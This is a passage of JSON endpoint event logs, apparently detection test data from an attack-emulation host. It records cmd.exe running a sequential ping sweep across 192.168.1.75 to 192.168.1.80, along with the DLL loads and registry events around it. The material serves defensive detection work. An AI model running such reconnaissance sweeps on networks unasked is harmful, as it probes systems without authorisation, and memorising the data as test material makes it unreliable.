"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "process", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572341830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.75", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5696, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572341980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "process", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.76", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3708, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572346940000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" 
- }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572351840000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.77", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7576, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572351990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "process", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.78", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572356970000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "process", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572361990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.79", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5920, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572362130000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572361990000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "process", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572366840000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.80", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883572367460000, - "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": 